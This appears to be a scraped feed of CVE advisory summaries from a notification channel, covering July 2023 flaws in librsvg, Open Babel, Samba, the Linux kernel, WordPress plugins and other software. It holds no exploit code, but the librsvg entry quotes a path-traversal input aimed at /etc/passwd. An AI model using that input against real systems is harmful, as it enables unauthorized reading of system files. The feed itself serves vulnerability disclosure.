🚨 CVE-2023-3843A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.🎖@cveNotify |
|
| 2023-07-23 05:58:38 |
🚨 CVE-2023-2088A flaw was found in OpenStack due to an inconsistency between Cinder and Nova. This issue can be triggered intentionally or by accident. A remote, authenticated attacker could exploit this vulnerability by detaching one of their volumes from Cinder. The highest impact is to confidentiality.🎖@cveNotify |
|
| 2023-07-23 05:58:35 |
🚨 CVE-2023-0045The current implementation of the prctl syscall does not issue an IBPB immediately during the syscall. The ib_prctl_set function updates the Thread Information Flags (TIFs) for the task and updates the SPEC_CTRL MSR on the function __speculation_ctrl_update, but the IBPB is only issued on the next schedule, when the TIF bits are checked. This leaves the victim vulnerable to values already injected on the BTB, prior to the prctl syscall. The patch that added the support for the conditional mitigation via prctl (ib_prctl_set) dates back to the kernel 4.9.176.We recommend upgrading past commit a664ec9158eeddd75121d39c9a0758016097fa96🎖@cveNotify |
|
| 2023-07-23 05:58:34 |
🚨 CVE-2023-1855A use-after-free flaw was found in xgene_hwmon_remove in drivers/hwmon/xgene-hwmon.c in the Hardware Monitoring Linux Kernel Driver (xgene-hwmon). This flaw could allow a local attacker to crash the system due to a race problem. This vulnerability could even lead to a kernel information leak problem.🎖@cveNotify |
|
| 2023-07-23 05:58:33 |
🚨 CVE-2023-1611A use-after-free flaw was found in btrfs_search_slot in fs/btrfs/ctree.c in btrfs in the Linux Kernel.This flaw allows an attacker to crash the system and possibly cause a kernel information lea🎖@cveNotify |
|
| 2023-07-23 05:58:32 |
🚨 CVE-2023-1579Heap based buffer overflow in binutils-gdb/bfd/libbfd.c in bfd_getl64.🎖@cveNotify |
|
| 2023-07-23 05:58:31 |
🚨 CVE-2023-1393A flaw was found in X.Org Server Overlay Window. A Use-After-Free may lead to local privilege escalation. If a client explicitly destroys the compositor overlay window (aka COW), the Xserver would leave a dangling pointer to that window in the CompScreen structure, which will trigger a use-after-free later.🎖@cveNotify |
|
| 2023-07-23 05:58:27 |
🚨 CVE-2021-25220BIND 9.11.0 -> 9.11.36 9.12.0 -> 9.16.26 9.17.0 -> 9.18.0 BIND Supported Preview Editions: 9.11.4-S1 -> 9.11.36-S1 9.16.8-S1 -> 9.16.26-S1 Versions of BIND 9 earlier than those shown - back to 9.1.0, including Supported Preview Editions - are also believed to be affected but have not been tested as they are EOL. The cache could become poisoned with incorrect records leading to queries being made to the wrong servers, which might also result in false information being returned to clients.🎖@cveNotify |
|
| 2023-07-23 05:58:26 |
🚨 CVE-2021-38575NetworkPkg/IScsiDxe has remotely exploitable buffer overflows.🎖@cveNotify |
|
| 2023-07-22 22:58:14 |
🚨 CVE-2023-3837A vulnerability classified as problematic has been found in DedeBIZ 6.2.10. Affected is an unknown function of the file /admin/sys_sql_query.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235188. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-22 22:58:13 |
🚨 CVE-2023-33863SerialiseValue in RenderDoc before 1.27 allows an Integer Overflow with a resultant Buffer Overflow. 0xffffffff is sign-extended to 0xffffffffffffffff (SIZE_MAX) and then there is an attempt to add 1.🎖@cveNotify |
|
| 2023-07-22 22:58:12 |
🚨 CVE-2023-33865RenderDoc before 1.27 allows local privilege escalation via a symlink attack. It relies on the /tmp/RenderDoc directory regardless of ownership.🎖@cveNotify |
|
| 2023-07-22 20:58:29 |
🚨 CVE-2023-3835A vulnerability classified as problematic has been found in Bug Finder MineStack 1.0. This affects an unknown part of the file /user/ticket/create of the component Ticket Handler. The manipulation of the argument message leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-235161 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-22 20:58:28 |
🚨 CVE-2023-3836A vulnerability classified as critical was found in Dahua Smart Park Management up to 20230713. This vulnerability affects unknown code of the file /emap/devicePoint_addImgIco?hasSubsystem=true. The manipulation of the argument upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235162 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-22 20:58:26 |
🚨 CVE-2022-42885A use of uninitialized pointer vulnerability exists in the GRO format res functionality of Open Babel 3.1.1 and master commit 530dbfa3. A specially crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-22 20:58:24 |
🚨 CVE-2022-46289Multiple out-of-bounds write vulnerabilities exist in the ORCA format nAtoms functionality of Open Babel 3.1.1 and master commit 530dbfa3. A specially-crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.nAtoms calculation wrap-around, leading to a small buffer allocation🎖@cveNotify |
|
| 2023-07-22 20:58:22 |
🚨 CVE-2022-43467An out-of-bounds write vulnerability exists in the PQS format coord_file functionality of Open Babel 3.1.1 and master commit 530dbfa3. A specially crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-22 20:58:21 |
🚨 CVE-2022-46290Multiple out-of-bounds write vulnerabilities exist in the ORCA format nAtoms functionality of Open Babel 3.1.1 and master commit 530dbfa3. A specially-crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.The loop that stores the coordinates does not check its index against nAtoms🎖@cveNotify |
|
| 2023-07-22 20:58:20 |
🚨 CVE-2022-37331An out-of-bounds write vulnerability exists in the Gaussian format orientation functionality of Open Babel 3.1.1 and master commit 530dbfa3. A specially crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-22 20:58:18 |
🚨 CVE-2022-43607An out-of-bounds write vulnerability exists in the MOL2 format attribute and value functionality of Open Babel 3.1.1 and master commit 530dbfa3. A specially crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-22 20:58:17 |
🚨 CVE-2022-44451A use of uninitialized pointer vulnerability exists in the MSI format atom functionality of Open Babel 3.1.1 and master commit 530dbfa3. A specially crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-22 20:58:15 |
🚨 CVE-2022-46293Multiple out-of-bounds write vulnerabilities exist in the translationVectors parsing functionality in multiple supported formats of Open Babel 3.1.1 and master commit 530dbfa3. A specially-crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability affects the MOPAC file format, inside the Final Point and Derivatives section🎖@cveNotify |
|
| 2023-07-22 20:58:14 |
🚨 CVE-2022-46294Multiple out-of-bounds write vulnerabilities exist in the translationVectors parsing functionality in multiple supported formats of Open Babel 3.1.1 and master commit 530dbfa3. A specially-crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability affects the MOPAC Cartesian file format🎖@cveNotify |
|
| 2023-07-22 20:58:13 |
🚨 CVE-2022-46295Multiple out-of-bounds write vulnerabilities exist in the translationVectors parsing functionality in multiple supported formats of Open Babel 3.1.1 and master commit 530dbfa3. A specially-crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability affects the Gaussian file format🎖@cveNotify |
|
| 2023-07-22 19:58:19 |
🚨 CVE-2023-38633A directory traversal problem in the URL decoder of librsvg before 2.56.3 could be used by local or remote attackers to disclose files (on the local filesystem outside of the expected area), as demonstrated by href=".?../../../../../../../../../../etc/passwd" in an xi:include element.🎖@cveNotify |
|
| 2023-07-22 19:58:18 |
🚨 CVE-2023-3834A vulnerability was found in Bug Finder EX-RATE 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /user/ticket/create of the component Ticket Handler. The manipulation of the argument message leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-235160. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-22 19:58:14 |
🚨 CVE-2022-46291Multiple out-of-bounds write vulnerabilities exist in the translationVectors parsing functionality in multiple supported formats of Open Babel 3.1.1 and master commit 530dbfa3. A specially-crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability affects the MSI file format🎖@cveNotify |
|
| 2023-07-22 19:58:13 |
🚨 CVE-2022-46292Multiple out-of-bounds write vulnerabilities exist in the translationVectors parsing functionality in multiple supported formats of Open Babel 3.1.1 and master commit 530dbfa3. A specially-crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability affects the MOPAC file format, inside the Unit Cell Translation section🎖@cveNotify |
|
| 2023-07-22 19:58:12 |
🚨 CVE-2023-3833A vulnerability was found in Bug Finder Montage 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /user/ticket/create of the component Ticket Handler. The manipulation of the argument message leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-235159. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-22 17:58:16 |
🚨 CVE-2023-3830A vulnerability was found in Bug Finder SASS BILLER 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /company/store. The manipulation of the argument name leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-235151. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-22 17:58:15 |
🚨 CVE-2023-3831A vulnerability was found in Bug Finder Finounce 1.0 and classified as problematic. This issue affects some unknown processing of the file /user/ticket/create of the component Ticket Handler. The manipulation of the argument message leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235157 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-22 17:58:14 |
🚨 CVE-2023-38646Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.🎖@cveNotify |
|
| 2023-07-22 17:58:13 |
🚨 CVE-2023-3801A vulnerability was found in IBOS OA 4.5.5. It has been declared as critical. Affected by this vulnerability is the function actionEdit of the file ?r=officialdoc/officialdoc/edit of the component Mobile Notification Handler. The manipulation leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-235069 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-22 17:58:12 |
🚨 CVE-2022-21669PuddingBot is a group management bot. In version 0.0.6-b933652 and prior, the bot token is publicly exposed in main.py, making it accessible to malicious actors. The bot token has been revoked and new version is already running on the server. As of time of publication, the maintainers are planning to update code to reflect this change at a later date.🎖@cveNotify |
|
| 2023-07-22 14:58:11 |
🚨 CVE-2023-3829A vulnerability was found in Bug Finder ICOGenie 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /user/ticket/create of the component Support Ticket Handler. The manipulation of the argument message leads to cross site scripting. The attack can be initiated remotely. VDB-235150 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-22 12:58:12 |
🚨 CVE-2023-3828A vulnerability was found in Bug Finder Listplace Directory Listing Platform 3.0. It has been classified as problematic. This affects an unknown part of the file /listplace/user/coverPhotoUpdate of the component Photo Handler. The manipulation of the argument user_cover_photo leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-235149 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-22 10:58:15 |
🚨 CVE-2023-3827A vulnerability was found in Bug Finder Listplace Directory Listing Platform 3.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /listplace/user/ticket/create of the component HTTP POST Request Handler. The manipulation of the argument message leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-235148. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-22 10:58:14 |
🚨 CVE-2023-3826A vulnerability has been found in IBOS OA 4.5.5 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /?r=recruit/resume/edit&op=status of the component Interview Handler. The manipulation of the argument resumeid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235147. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-22 10:58:13 |
🚨 CVE-2023-3247In PHP versions 8.0.* before 8.0.29, 8.1.* before 8.1.20, 8.2.* before 8.2.7 when using SOAP HTTP Digest Authentication, random value generator was not checked for failure, and was using narrower range of values than it should have. In case of random generator failure, it could lead to a disclosure of 31 bits of uninitialized memory from the client to the server, and it also made easier to a malicious server to guess the client's nonce. 🎖@cveNotify |
|
| 2023-07-22 10:58:12 |
🚨 CVE-2023-3801A vulnerability was found in IBOS OA 4.5.5. It has been declared as critical. Affected by this vulnerability is the function actionEdit of the file ?r=officialdoc/officialdoc/edit of the component Mobile Notification Handler. The manipulation leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-235069 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-22 06:58:17 |
🚨 CVE-2023-34966An infinite loop vulnerability was found in Samba's mdssvc RPC service for Spotlight. When parsing Spotlight mdssvc RPC packets sent by the client, the core unmarshalling function sl_unpack_loop() did not validate a field in the network packet that contains the count of elements in an array-like structure. By passing 0 as the count value, the attacked function will run in an endless loop consuming 100% CPU. This flaw allows an attacker to issue a malformed RPC request, triggering an infinite loop, resulting in a denial of service condition.🎖@cveNotify |
|
| 2023-07-22 06:58:16 |
🚨 CVE-2023-34967A Type Confusion vulnerability was found in Samba's mdssvc RPC service for Spotlight. When parsing Spotlight mdssvc RPC packets, one encoded data structure is a key-value style dictionary where the keys are character strings, and the values can be any of the supported types in the mdssvc protocol. Due to a lack of type checking in callers of the dalloc_value_for_key() function, which returns the object associated with a key, a caller may trigger a crash in talloc_get_size() when talloc detects that the passed-in pointer is not a valid talloc pointer. With an RPC worker process shared among multiple client connections, a malicious client or attacker can trigger a process crash in a shared RPC mdssvc worker process, affecting all other clients this worker serves.🎖@cveNotify |
|
| 2023-07-22 06:58:13 |
🚨 CVE-2023-34968A path disclosure vulnerability was found in Samba. As part of the Spotlight protocol, Samba discloses the server-side absolute path of shares, files, and directories in the results for search queries. This flaw allows a malicious client or an attacker with a targeted RPC request to view the information that is part of the disclosed path.🎖@cveNotify |
|
| 2023-07-22 06:58:12 |
🚨 CVE-2023-25929IBM Cognos Analytics 11.1 and 11.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 247861.🎖@cveNotify |
|
| 2023-07-22 06:58:11 |
🚨 CVE-2023-28530IBM Cognos Analytics 11.1 and 11.2 is vulnerable to stored cross-site scripting, caused by improper validation of SVG Files in Custom Visualizations. A remote attacker could exploit this vulnerability to execute scripts in a victim's Web browser within the security context of the hosting Web site. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. IBM X-Force ID: 251214.🎖@cveNotify |
|
| 2023-07-21 22:58:34 |
🚨 CVE-2022-46291Multiple out-of-bounds write vulnerabilities exist in the translationVectors parsing functionality in multiple supported formats of Open Babel 3.1.1 and master commit 530dbfa3. A specially-crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability affects the MSI file format🎖@cveNotify |
|
| 2023-07-21 22:58:33 |
🚨 CVE-2022-46292Multiple out-of-bounds write vulnerabilities exist in the translationVectors parsing functionality in multiple supported formats of Open Babel 3.1.1 and master commit 530dbfa3. A specially-crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability affects the MOPAC file format, inside the Unit Cell Translation section🎖@cveNotify |
|
| 2023-07-21 22:58:32 |
🚨 CVE-2023-37918Dapr is a portable, event-driven, runtime for building distributed applications across cloud and edge. A vulnerability has been found in Dapr that allows bypassing API token authentication, which is used by the Dapr sidecar to authenticate calls coming from the application, with a well-crafted HTTP request. Users who leverage API token authentication are encouraged to upgrade Dapr to 1.10.9 or to 1.11.2. This vulnerability impacts Dapr users who have configured API token authentication. An attacker could craft a request that is always allowed by the Dapr sidecar over HTTP, even if the `dapr-api-token` in the request is invalid or missing. The issue has been fixed in Dapr 1.10.9 or to 1.11.2. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-07-21 22:58:31 |
🚨 CVE-2022-46293Multiple out-of-bounds write vulnerabilities exist in the translationVectors parsing functionality in multiple supported formats of Open Babel 3.1.1 and master commit 530dbfa3. A specially-crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability affects the MOPAC file format, inside the Final Point and Derivatives section🎖@cveNotify |
|
| 2023-07-21 22:58:28 |
🚨 CVE-2022-46294Multiple out-of-bounds write vulnerabilities exist in the translationVectors parsing functionality in multiple supported formats of Open Babel 3.1.1 and master commit 530dbfa3. A specially-crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.This vulnerability affects the MOPAC Cartesian file format🎖@cveNotify |
|
| 2023-07-21 22:58:27 |
🚨 CVE-2023-3609A use-after-free vulnerability in the Linux kernel's net/sched: cls_u32 component can be exploited to achieve local privilege escalation.If tcf_change_indev() fails, u32_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.We recommend upgrading past commit 04c55383fa5689357bcdd2c8036725a55ed632bc.🎖@cveNotify |
|
| 2023-07-21 22:58:26 |
🚨 CVE-2023-3610A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.Flaw in the error handling of bound chains causes a use-after-free in the abort path of NFT_MSG_NEWRULE. The vulnerability requires CAP_NET_ADMIN to be triggered.We recommend upgrading past commit 4bedf9eee016286c835e3d8fa981ddece5338795.🎖@cveNotify |
|
| 2023-07-21 22:58:25 |
🚨 CVE-2023-35077An out-of-bounds write vulnerability on windows operating systems causes the Ivanti AntiVirus Product to crash. Update to Ivanti AV Product version 7.9.1.285 or above.🎖@cveNotify |
|
| 2023-07-21 22:58:21 |
🚨 CVE-2023-37915OpenDDS is an open source C++ implementation of the Object Management Group (OMG) Data Distribution Service (DDS). OpenDDS crashes while parsing a malformed `PID_PROPERTY_LIST` in a DATA submessage during participant discovery. Attackers can remotely crash OpenDDS processes by sending a DATA submessage containing the malformed parameter to the known multicast port. This issue has been addressed in version 3.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-07-21 22:58:20 |
🚨 CVE-2023-3776A use-after-free vulnerability in the Linux kernel's net/sched: cls_fw component can be exploited to achieve local privilege escalation.If tcf_change_indev() fails, fw_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.We recommend upgrading past commit 0323bce598eea038714f941ce2b22541c46d488f.🎖@cveNotify |
|
| 2023-07-21 22:58:19 |
🚨 CVE-2022-3538The Webmaster Tools Verification WordPress plugin through 1.2 does not have authorisation and CSRF checks when disabling plugins, allowing unauthenticated users to disable arbitrary plugins🎖@cveNotify |
|
| 2023-07-21 22:58:15 |
🚨 CVE-2022-3489The WP Hide WordPress plugin through 0.0.2 does not have authorisation and CSRF checks in place when updating the custom_wpadmin_slug settings, allowing unauthenticated attackers to update it with a crafted request🎖@cveNotify |
|
| 2023-07-21 22:58:14 |
🚨 CVE-2022-3585A vulnerability classified as problematic has been found in SourceCodester Simple Cold Storage Management System 1.0. Affected is an unknown function of the file /csms/?page=contact_us of the component Contact Us. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-211194 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-21 22:58:13 |
🚨 CVE-2022-3569Due to an issue with incorrect sudo permissions, Zimbra Collaboration Suite (ZCS) suffers from a local privilege escalation issue in versions 9.0.0 and prior, where the 'zimbra' user can effectively coerce postfix into running arbitrary commands as 'root'.🎖@cveNotify |
|
| 2023-07-21 22:58:12 |
🚨 CVE-2022-3517A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.🎖@cveNotify |
|
| 2023-07-21 21:58:27 |
🚨 CVE-2022-3225Improper Access Control in GitHub repository budibase/budibase prior to 1.3.20.🎖@cveNotify |
|
| 2023-07-21 21:58:26 |
🚨 CVE-2022-3186Dataprobe iBoot-PDU FW versions prior to 1.42.06162022 contain a vulnerability where the affected product allows an attacker to access the device’s main management page from the cloud. This feature enables users to remotely connect devices, however, the current implementation permits users to access other device's information.🎖@cveNotify |
|
| 2023-07-21 21:58:25 |
🚨 CVE-2022-23527mod_auth_openidc is an OpenID Certified™ authentication and authorization module for the Apache 2.x HTTP server. Versions prior to 2.4.12.2 are vulnerable to Open Redirect. When providing a logout parameter to the redirect URI, the existing code in oidc_validate_redirect_url() does not properly check for URLs that start with /\t, leading to an open redirect. This issue has been patched in version 2.4.12.2. Users unable to upgrade can mitigate the issue by configuring mod_auth_openidc to only allow redirection when the destination matches a given regular expression with OIDCRedirectURLsAllowed.🎖@cveNotify |
|
| 2023-07-21 21:58:21 |
🚨 CVE-2022-3206The Passster WordPress plugin before 3.5.5.5.2 stores the password inside a cookie named "passster" using base64 encoding method which is easy to decode. This puts the password at risk in case the cookies get leaked.🎖@cveNotify |
|
| 2023-07-21 21:58:20 |
🚨 CVE-2022-4811Authorization Bypass Through User-Controlled Key vulnerability in usememos usememos/memos.This issue affects usememos/memos before 0.9.1.🎖@cveNotify |
|
| 2023-07-21 21:58:19 |
🚨 CVE-2022-4734Improper Removal of Sensitive Information Before Storage or Transfer in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2023-07-21 19:58:35 |
🚨 CVE-2023-33148Microsoft Office Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-21 19:58:34 |
🚨 CVE-2023-26301Certain HP LaserJet Pro print products are potentially vulnerable to an Elevation of Privilege and/or Information Disclosure related to a lack of authentication with certain endpoints.🎖@cveNotify |
|
| 2023-07-21 19:58:33 |
🚨 CVE-2023-38334Omnis Studio 10.22.00 has incorrect access control. It advertises an irreversible feature for locking classes within Omnis libraries: it should be no longer possible to delete, view, change, copy, rename, duplicate, or print a locked class. Due to implementation issues, locked classes in Omnis libraries can be unlocked, and thus further analyzed and modified by Omnis Studio. This allows for further analyzing and also deleting, viewing, changing, copying, renaming, duplicating, or printing previously locked Omnis classes. This violates the expected behavior of an "irreversible operation."🎖@cveNotify |
|
| 2023-07-21 19:58:32 |
🚨 CVE-2023-38335Omnis Studio 10.22.00 has incorrect access control. It advertises a feature for making Omnis libraries "always private" - this is supposed to be an irreversible operation. However, due to implementation issues, "always private" Omnis libraries can be opened by the Omnis Studio browser by bypassing specific checks. This violates the expected behavior of an "irreversible operation".🎖@cveNotify |
|
| 2023-07-21 19:58:30 |
🚨 CVE-2022-0950Unrestricted Upload of File with Dangerous Type in GitHub repository star7th/showdoc prior to 2.10.4.🎖@cveNotify |
|
| 2023-07-21 19:58:29 |
🚨 CVE-2022-0553There is no check to see if slot 0 is being uploaded from the device to the host. When using encrypted images this means the unencrypted firmware can be retrieved easily.🎖@cveNotify |
|
| 2023-07-21 19:58:28 |
🚨 CVE-2022-0885The Member Hero WordPress plugin through 1.0.9 lacks authorization checks, and does not validate the a request parameter in an AJAX action, allowing unauthenticated users to call arbitrary PHP functions with no arguments.🎖@cveNotify |
|
| 2023-07-21 19:58:27 |
🚨 CVE-2022-0882A bug exists where an attacker can read the kernel log through exposed Zircon kernel addresses without the required capability ZX_RSRC_KIND_ROOT. It is recommended to upgrade the Fuchsia kernel to 4.1.1 or greater.🎖@cveNotify |
|
| 2023-07-21 19:58:26 |
🚨 CVE-2022-0895Static Code Injection in GitHub repository microweber/microweber prior to 1.3.🎖@cveNotify |
|
| 2023-07-21 19:58:25 |
🚨 CVE-2022-0764Arbitrary Command Injection in GitHub repository strapi/strapi prior to 4.1.0.🎖@cveNotify |
|
| 2023-07-21 19:58:23 |
🚨 CVE-2022-0762Business Logic Errors in GitHub repository microweber/microweber prior to 1.3.🎖@cveNotify |
|
| 2023-07-21 19:58:22 |
🚨 CVE-2022-0565Exposure of Sensitive Information to an Unauthorized Actor in Packagist pimcore/pimcore prior to 10.3.1.🎖@cveNotify |
|
| 2023-07-21 19:58:21 |
🚨 CVE-2022-0718A flaw was found in python-oslo-utils. Due to improper parsing, passwords with a double quote ( " ) in them cause incorrect masking in debug logs, causing any part of the password after the double quote to be plaintext.🎖@cveNotify |
|
| 2023-07-21 19:58:20 |
🚨 CVE-2022-0985Insufficient capability checks could allow users with the moodle/site:uploadusers capability to delete users, without having the necessary moodle/user:delete capability.🎖@cveNotify |
|
| 2023-07-21 19:58:19 |
🚨 CVE-2022-0992The SiteGround Security plugin for WordPress is vulnerable to authentication bypass that allows unauthenticated users to log in as administrative users due to missing identity verification on initial 2FA set-up that allows unauthenticated and unauthorized users to configure 2FA for pending accounts. Upon successful configuration, the attacker is logged in as that user without access to a username/password pair which is the expected first form of authentication. This affects versions up to, and including, 1.2.5.🎖@cveNotify |
|
| 2023-07-21 19:58:18 |
🚨 CVE-2022-0993The SiteGround Security plugin for WordPress is vulnerable to authentication bypass that allows unauthenticated users to log in as administrative users due to missing identity verification on the 2FA back-up code implementation that logs users in upon success. This affects versions up to, and including, 1.2.5.🎖@cveNotify |
|
| 2023-07-21 19:58:17 |
🚨 CVE-2022-1316ZeroTierOne for windows local privilege escalation because of incorrect directory privilege in GitHub repository zerotier/zerotierone prior to 1.8.8. Local Privilege Escalation🎖@cveNotify |
|
| 2023-07-21 19:58:16 |
🚨 CVE-2022-0715A CWE-287: Improper Authentication vulnerability exists that could cause an attacker to arbitrarily change the behavior of the UPS when a key is leaked and used to upload malicious firmware. Affected Product: APC Smart-UPS Family: SMT Series (SMT Series ID=18: UPS 09.8 and prior / SMT Series ID=1040: UPS 01.2 and prior / SMT Series ID=1031: UPS 03.1 and prior), SMC Series (SMC Series ID=1005: UPS 14.1 and prior / SMC Series ID=1007: UPS 11.0 and prior / SMC Series ID=1041: UPS 01.1 and prior), SCL Series (SCL Series ID=1030: UPS 02.5 and prior / SCL Series ID=1036: UPS 02.5 and prior), SMX Series (SMX Series ID=20: UPS 10.2 and prior / SMX Series ID=23: UPS 07.0 and prior), SRT Series (SRT Series ID=1010/1019/1025: UPS 08.3 and prior / SRT Series ID=1024: UPS 01.0 and prior / SRT Series ID=1020: UPS 10.4 and prior / SRT Series ID=1021: UPS 12.2 and prior / SRT Series ID=1001/1013: UPS 05.1 and prior / SRT Series ID=1002/1014: UPSa05.2 and prior), APC SmartConnect Family: SMT Series (SMT Series ID=1015: UPS 04.5 and prior), SMC Series (SMC Series ID=1018: UPS 04.2 and prior), SMTL Series (SMTL Series ID=1026: UPS 02.9 and prior), SCL Series (SCL Series ID=1029: UPS 02.5 and prior / SCL Series ID=1030: UPS 02.5 and prior / SCL Series ID=1036: UPS 02.5 and prior / SCL Series ID=1037: UPS 03.1 and prior), SMX Series (SMX Series ID=1031: UPS 03.1 and prior)🎖@cveNotify |
|
| 2023-07-21 19:58:15 |
🚨 CVE-2022-0579Improper Privilege Management in Packagist snipe/snipe-it prior to 5.3.9.🎖@cveNotify |
|
| 2023-07-21 19:58:14 |
🚨 CVE-2022-0578Code Injection in GitHub repository publify/publify prior to 9.2.8.🎖@cveNotify |
|
| 2023-07-21 16:58:37 |
🚨 CVE-2023-3822Cross-site Scripting (XSS) - Reflected in GitHub repository pimcore/pimcore prior to 10.6.4.🎖@cveNotify |
|
| 2023-07-21 16:58:36 |
🚨 CVE-2023-37744Maid Hiring Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/search-booking-request.php.🎖@cveNotify |
|
| 2023-07-21 16:58:35 |
🚨 CVE-2023-30151A SQL injection vulnerability in the Boxtal (envoimoinscher) module for PrestaShop, after version 3.1.10, allows remote authenticated users to execute arbitrary SQL commands via the `key` GET parameter.🎖@cveNotify |
|
| 2023-07-21 16:58:31 |
🚨 CVE-2023-37746A cross-site scripting (XSS) vulnerability in Maid Hiring Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter of the /admin/contactus.php component.🎖@cveNotify |
|
| 2023-07-21 16:58:30 |
🚨 CVE-2023-37787Multiple cross-site scripting (XSS) vulnerabilities in Geeklog v2.2.2 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Rule and Route parameters of /admin/router.php.🎖@cveNotify |
|
| 2023-07-21 16:58:29 |
